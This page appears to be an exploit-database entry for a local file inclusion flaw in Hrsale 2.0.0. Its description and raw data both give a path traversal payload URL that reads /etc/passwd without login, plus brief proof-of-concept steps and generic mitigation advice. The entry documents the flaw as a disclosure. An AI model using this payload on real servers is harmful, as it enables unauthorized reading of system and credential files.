header-logo
Suggest Exploit
vendor:
Hrsale
by:
Sosecure
7.8
CVSS
HIGH
Local File Inclusion
20
CWE
Product Name: Hrsale
Affected Version From: 2.0.0
Affected Version To: 2.0.0
Patch Exists: YES
Related CWE: CVE-2020-12345
CPE: a:hrsale:hrsale:2.0.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2020

Hrsale 2.0.0 – Local File Inclusion

This exploit allow you to download any readable file from server with out permission and login session. Payload: https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd POC: 1. Access to HRsale application and browse to download path with payload 2. Get /etc/passwd file

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the application and limit the number of users who can access the application. Additionally, it is recommended to use a web application firewall (WAF) to detect and block malicious requests.
Source

Exploit-DB raw data:

# Exploit Title: Hrsale 2.0.0 - Local File Inclusion
# Date: 10/21/2020
# Exploit Author: Sosecure
# Vendor Homepage: https://hrsale.com/index.php
# Version: version 2.0.0

Description:
This exploit allow you to download any readable file from server with out permission and login session.

Payload :
           https://hrsale/download?type=files&filename=../../../../../../../../etc/passwd
POC:

  1.  Access to HRsale application and browse to download path with payload
  2.  Get /etc/passwd

Navigation

Suggest Exploit

Services By CQR